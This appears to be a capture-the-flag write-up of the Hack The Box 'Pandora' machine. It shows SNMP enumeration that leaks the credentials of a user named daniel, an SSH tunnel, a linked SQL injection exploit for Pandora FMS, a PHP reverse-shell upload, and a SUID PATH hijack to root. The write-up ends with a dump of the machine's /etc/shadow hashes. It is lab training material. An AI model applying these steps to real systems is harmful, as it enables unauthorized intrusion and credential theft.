Highlights
Enumeration using nmap reveals a web service which seems to be serving static pages. UDP scan reveals SNMP open. Enumerating SNMP using reveals user credentials. Once inside the box, we see another website only accessible to localhost. This website hosts an open source monitoring system with a known vulnerability. Exploiting the same, we get a more privileged shell as another user. From there onwards an SUID vulnerability leads to root access.
First we start with the nmap scan.
nmap -sV -sC 10.129.252.195
We see that the TCP ports 22(ssh) and 80(http) are open. Let’s check what the port 80 gives us.
Navigating the website, it seems like all are static pages and no dynamic content is being shown. There is one form for filling sending a message to admins, but the form does not do anything except refresh the page. There is also not a robots.txt that may reveal some juicy info. Maybe there are some interesting hidden directories, let’s fire gobuster!
gobuster dir -u http://10.129.252.195 -w /usr/share/wordlist/directory-list-2.3-small.txt
Gobuster gives nothing interesting except, the /assets directory which contains javascript and css files and some images. Maybe this is the directory where it is fetching the contents on the main website from.
Lets try a UDP scan.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
┌─[puck@parrot-lt]─[~/htb/pandora]
We got one port(UDP 161) SNMP. Lets see what it has to offer. We run snmpwalk with the public community string.
public is default for most snmp servers and thats why I tried public first, if it doesn’t work, one might have to bruteforce the community string.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $snmpwalk -v 2c pandora.htb -c public
Snmpwalk gave us a bunch of details, but the most interesting one is the credentials of the user Daniel. Apparently there is a process running and the command of that includes the credentials for the user Daniel.
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrig
ger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
Let’s ssh into the box with the obtained credentials. The user “daniel” does not have a lot of privileges. Looking at /etc/passwd, there is one other user matt which might have privileges. Looking around the system, we see that alongwith the static website that we saw earlier, there is one another web app called pandora. But looking at the sites-enabled config, there seems to be no way to it. But making a curl request from the localhost(victim), shows something interesting.
It seems like only the localhost might have access to that website. Let’s create an ssh tunnel to port 80 so that we can view the website from our machine.
We can create an SSH tunnel to this service using
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora] └──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb daniel@10.10.11.136's password:HotelBabylon23 Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon 24 Jan 15:07:49 UTC 2022 System load: 0.37 Processes: 259 Usage of /: 63.6% of 4.87GB Users logged in: 1 Memory usage: 18% IPv4 address for eth0: 10.10.11.136 Swap usage: 0% => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28 daniel@pandora:~$
The pandora console opens and asks for credentials.
Common login credentials like admin/admin, admin/password don’t work. Googling pandora gives us the information that it is a monitoring system. Moreover the version of the pandora is clearly visible on the bottom of the login page: v7.0NG.742. On searching for the exploit specific to this version we come across a very interesting article.
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
This article gives a detailed explanation of the underlying vulnerability. Using this sql injection we can bypass the login page and get admin access
https://github.com/zjicmDarkWing/CVE-2021-32099
and then visit http://127.0.0.1/pandora_console/
and you are logged on as admin
After logging in as admin, we snoop around a bit and see that there is a file upload options. It also seems like the system is written in php. So lets use the good old php-reverse-shell.
We upload the shell and set a listener at 9000 on our machine and navigate to the shell in our browser.
http://127.0.0.1/pandora_console/images/shell.php
Voila! We get a reverse shell with the user matt and we get user.txt. Great!!!
We generate ssh keys, so that we can login with ssh and not have to deal with the crappy shell.
After logging in, the first thing we do is obtain linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye catching thing is a binary called pandora_backup with the SUID set.
Looking at the contents of the binary, we see that it is using tar to uncompress something from /root. Since tar is not being called with the absolute path, we can use PATH highjacking to obtain root.
matt@pandora:/$ file /usr/bin/pandora_backup
file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$
We create a local file tar, with contents “/bin/sh”, append the path to our PATH env variable and run the binary and we get root and out last flag inside /root
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora] └──╼ $ssh matt@pandora.htb -i id_rsa Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue 25 Jan 11:48:33 UTC 2022 System load: 0.27 Processes: 288 Usage of /: 63.4% of 4.87GB Users logged in: 1 Memory usage: 11% IPv4 address for eth0: 10.10.11.136 Swap usage: 0% => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. matt@pandora:~$ ls user.txt matt@pandora:~$ export PATH=/home/matt:$PATH matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client /home/matt/tar: 1: bin/bash: not found Backup failed! Check your permissions! matt@pandora:~$ echo $PATH /home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin matt@pandora:~$ cat tar bin/bash matt@pandora:~$ echo "/bin/bash" > tar matt@pandora:~$ cat tar /bin/bash matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:~# cd /root root@pandora:/root# ls root.txt root@pandora:/root# cat root.txt e50cb013f81c9bb1880dd795ffbaead8 root@pandora:/root# cat /etc/shadow\ > / cat: /etc/shadow/: Not a directory root@pandora:/root# cat /etc/shadow root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7::: daemon:*:18659:0:99999:7::: bin:*:18659:0:99999:7::: --snip--: sshd:*:18789:0:99999:7::: systemd-coredump:!!:18789:::::: matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7::: lxd:!:18789:::::: Debian-snmp:!:18789:0:99999:7::: mysql:!:18789:0:99999:7::: daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7::: root@pandora:/root#